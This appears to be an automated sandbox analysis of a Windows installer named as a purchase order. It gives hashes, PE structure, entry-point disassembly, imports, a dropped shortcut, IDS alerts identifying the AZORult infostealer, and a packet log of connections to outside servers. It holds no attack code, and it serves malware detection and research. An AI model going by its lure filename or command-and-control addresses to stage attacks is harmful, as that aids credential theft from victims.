                                                                    SHA-512:C0F0F07E6BA4A6676B753EC3613AC388DE88F32D508CB1B9BD8521FBF192889232B4722756DDC72A46B0AC4A4BFB48F26E06651E64CF3D31EB8F82134A5D3671
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.#b.........."!................P........................................p.......g....@A................................(!..P....P...............".......`..4.... ............................... ...............!..h............................text............................... ..`.rdata..$.... ......................@..@.data........0......................@....00cfg.......@......................@..@.rsrc........P......................@..@.reloc..4....`....... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):840
                                                                    Entropy (8bit):3.3700691322951384
                                                                    Encrypted:false
                                                                    SSDEEP:12:8wl01Rm/3BVkUnDyXdICRDufdpUPu7dI5ST5D0TL6CNbw4t2YCBTo8:8S/BTD3YDuL3I50B2bIJT
                                                                    MD5:FCFA8E3FCF1A0053D44C9D269EB41E40
                                                                    SHA1:3558529A9DB458F029D784E56ABC8F7F94666D2E
                                                                    SHA-256:DBF2655D8984EDF18B4B9CBD4AA7C42F4A2AEFDABAA594819704D8212EF22435
                                                                    SHA-512:40F7A8A90F6AE01DA1BFDC7BF656C94E3F52695E2EFF8FBCEF110724C6D545342D8634D06A06BEEEF8A15B5DABBC6C750611EAE95D511EE9ACB75FC287A56782
                                                                    Malicious:false
                                                                    Preview:L..................F........................................................=....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....h.2...........Tolknings.Fin.L............................................T.o.l.k.n.i.n.g.s...F.i.n...........\.F.o.n.t.s.\.T.o.l.k.n.i.n.g.s...F.i.n.c.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.O.v.e.r.f.u.r.n.i.s.h.e.d.\.T.u.b.e.r.c.u.l.i.s.a.t.i.o.n.\.W.o.o.d.w.o.s.e.\.C.i.r.c.u.l.a.r.i.z.a.t.i.o.n.s.1.2.6.\.I.l.t.n.i.n.g.e.r.n.e.s.\.M.e.l.l.i.v.o.r.o.u.s.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.575298268219731
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:PO No. 3200005919.exe
                                                                    File size:373461
                                                                    MD5:9453cdcf8221341d06bac47b8ab3aa19
                                                                    SHA1:c35a23cdc61eb42594e1a39a23ccae06399263c0
                                                                    SHA256:7490acc48d1659234d61c1716c0d549880a98375f502502b60dcc71b49f7f14f
                                                                    SHA512:d37774b11400256fb4fe21b1e298f90274b0c83f2b0f90bc7c5d2a6ed3e0edb276bc49df8f65b0099f1d0ce6c4abac277805adf590971e277d1c1e15fd1190cd
                                                                    SSDEEP:6144:8Iw37uc96d+riI5FhrmKugnyj/wFW+hy88BSFz0PALceeozAs9k:pld6f5Ftgayj/kW+hyRYBVce3k5
                                                                    TLSH:2F84BF2F711D505ED917353266AEF0AA2B597C8B2B71E8164BA37DDF94F07200A0FB02
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                                    Icon Hash:e0f0f0d0d8c0f81e
                                                                    Entrypoint:0x403489
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                    Instruction
                                                                    sub esp, 000002D4h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+14h], ebx
                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    call dword ptr [004080ACh]
                                                                    call dword ptr [004080A8h]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [0042A24Ch], eax
                                                                    je 00007F8370619723h
                                                                    push ebx
                                                                    call 00007F837061C9D1h
                                                                    cmp eax, ebx
                                                                    je 00007F8370619719h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 004082B0h
                                                                    push esi
                                                                    call 00007F837061C94Bh
                                                                    push esi
                                                                    call dword ptr [00408150h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], 00000000h
                                                                    jne 00007F83706196FCh
                                                                    push 0000000Ah
                                                                    call 00007F837061C9A4h
                                                                    push 00000008h
                                                                    call 00007F837061C99Dh
                                                                    push 00000006h
                                                                    mov dword ptr [0042A244h], eax
                                                                    call 00007F837061C991h
                                                                    cmp eax, ebx
                                                                    je 00007F8370619721h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007F8370619719h
                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00408044h]
                                                                    push ebx
                                                                    call dword ptr [004082A0h]
                                                                    mov dword ptr [0042A318h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push 000002B4h
                                                                    push eax
                                                                    push ebx
                                                                    push 004216E8h
                                                                    call dword ptr [00408188h]
                                                                    push 0040A384h
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x10890.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x63d10x6400False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x138e0x1400False0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x203580x600False0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x2b0000x350000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x600000x108900x10a00False0.19385867011278196data3.7626047476334135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_BITMAP0x603e80x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                                                    RT_ICON0x607500x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
                                                                    RT_ICON0x65bd80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                                                                    RT_ICON0x69e000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                    RT_ICON0x6c3a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                    RT_ICON0x6d4500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x6e2f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                    RT_ICON0x6ec800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x6f5280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x6fa900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                    RT_DIALOG0x6fef80x144dataEnglishUnited States
                                                                    RT_DIALOG0x700400x13cdataEnglishUnited States
                                                                    RT_DIALOG0x701800x100dataEnglishUnited States
                                                                    RT_DIALOG0x702800x11cdataEnglishUnited States
                                                                    RT_DIALOG0x703a00xc4dataEnglishUnited States
                                                                    RT_DIALOG0x704680x60dataEnglishUnited States
                                                                    RT_GROUP_ICON0x704c80x84dataEnglishUnited States
                                                                    RT_MANIFEST0x705500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                                                                    DLLImport
                                                                    KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.11.20104.21.2.649830802029468 11/28/22-16:37:02.608409TCP2029468ET TROJAN Win32/AZORult V3.3 Client Checkin M154983080192.168.11.20104.21.2.6
                                                                    104.21.2.6192.168.11.2080498302029137 11/28/22-16:37:03.671390TCP2029137ET TROJAN AZORult v3.3 Server Response M28049830104.21.2.6192.168.11.20
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 28, 2022 16:37:02.208327055 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.258344889 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.258560896 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.259182930 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.309118986 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334062099 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334155083 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334222078 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334285021 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334330082 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334350109 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334397078 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334397078 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334414005 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334484100 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334547997 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334546089 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334610939 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334673882 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.334706068 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334706068 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334882021 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.334882021 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.384736061 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.384824038 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.384953022 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385019064 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385050058 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385051012 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385119915 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385164022 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385210991 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385349989 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385399103 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385436058 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385519028 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385656118 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385687113 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385814905 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.385854006 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.385967016 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386049032 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386059999 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386130095 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386153936 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386209011 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386260033 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386336088 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386370897 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386419058 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386428118 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386492014 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386526108 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386573076 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386614084 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386689901 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386735916 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386774063 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386790991 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386869907 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.386873960 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.386997938 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.387049913 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.436908960 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.436988115 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437089920 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437146902 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437201023 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437257051 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437258005 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437302113 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437319994 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437417984 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437484026 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437491894 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437580109 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437630892 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437697887 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437700033 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.437851906 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.437907934 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438007116 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438067913 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438128948 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438169003 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438250065 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438256025 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438327074 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438363075 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438453913 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438491106 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438545942 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438566923 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438613892 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438684940 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438750029 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438805103 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438841105 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.438896894 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.438963890 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439012051 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439078093 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439120054 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439208031 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439291000 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439337969 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439357996 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439415932 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439465046 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439482927 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439542055 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439564943 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439632893 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439781904 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439841032 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439886093 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.439945936 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.439984083 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440033913 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440064907 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440102100 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440171957 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440217972 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440248966 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440373898 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440397024 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440442085 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440496922 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440552950 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440624952 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440668106 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440697908 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440893888 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.440903902 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.440984964 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.441042900 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.441057920 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.441138029 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.441262007 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.487751007 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.487839937 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.487905979 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.487972021 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.488012075 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.488081932 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.488152981 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.489581108 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.489674091 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.489866018 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.489866018 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.490449905 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.490534067 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.490613937 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.490745068 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.490834951 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.490977049 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491040945 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491066933 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491159916 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491161108 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491200924 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491293907 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491394997 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491420031 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491453886 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491527081 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491574049 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491673946 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491719961 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491765976 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491821051 CET4982980192.168.11.2086.109.170.4
